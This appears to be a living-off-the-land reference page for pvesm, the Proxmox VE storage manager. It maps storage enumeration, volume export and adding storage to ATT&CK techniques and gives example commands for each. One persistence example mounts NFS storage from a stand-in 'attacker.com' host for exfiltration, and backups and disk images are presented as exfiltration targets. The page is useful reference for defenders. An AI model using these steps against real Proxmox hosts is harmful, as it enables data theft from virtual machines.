.. /pvesm

Star

pvesm (Proxmox VE Storage Manager) manages storage resources in Proxmox VE including local, NFS, iSCSI, Ceph, and ZFS storage. Adversaries can use pvesm to enumerate storage infrastructure, locate VM disk images and backups, and identify sensitive data locations for exfiltration.

Paths

• /usr/sbin/pvesm

Resources

• https://pve.proxmox.com/pve-docs/pvesm.1.html
• https://pve.proxmox.com/wiki/Storage

Acknowledgements

• ZephrFish

Discovery

1. Display status of all storage resources including type, content types, and available space.

   pvesm status

   Use Case Enumerate all storage backends to understand where VM images and backups are stored.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pvesm status

   • pvesm status --output-format=json-pretty

   ATT&CK Technique T1082

2. List contents of a specific storage showing VM images, templates, backups, and ISOs.

   pvesm list {storage}

   Use Case Discover backup files and VM disk images for potential exfiltration or tampering.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pvesm list local

   • pvesm list local-lvm

   • pvesm list local --content backup

   ATT&CK Technique T1082

3. Get the filesystem path for a storage volume.

   pvesm path {storage}:{content}/{volname}

   Use Case Resolve storage paths for direct disk access and manipulation.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pvesm path local:backup/vzdump-qemu-100-2024_01_01-00_00_00.vma.zst

   ATT&CK Technique T1082

4. Scan an NFS server for available exports.

   pvesm scan nfs {server}

   Use Case Discover accessible NFS shares for lateral movement or additional storage targets.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pvesm scan nfs 192.168.1.100

   • pvesm nfsscan 192.168.1.100

   ATT&CK Technique T1135

5. Scan an iSCSI portal for available targets.

   pvesm scan iscsi {portal}

   Use Case Discover accessible iSCSI targets for storage enumeration or lateral movement.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1082

Exfiltration

1. Export a storage volume to a file.

   pvesm export {volume} {format} {filename}

   Use Case Exfiltrate VM disk images or backups for offline analysis or credential extraction.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1567

Persistence

1. Add a new storage resource to Proxmox.

   pvesm add {type} {storage} --path {path}

   Use Case Add attacker-controlled storage for staging or exfiltration.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pvesm add nfs exfil --server attacker.com --export /data --path /mnt/exfil

   ATT&CK Technique T1074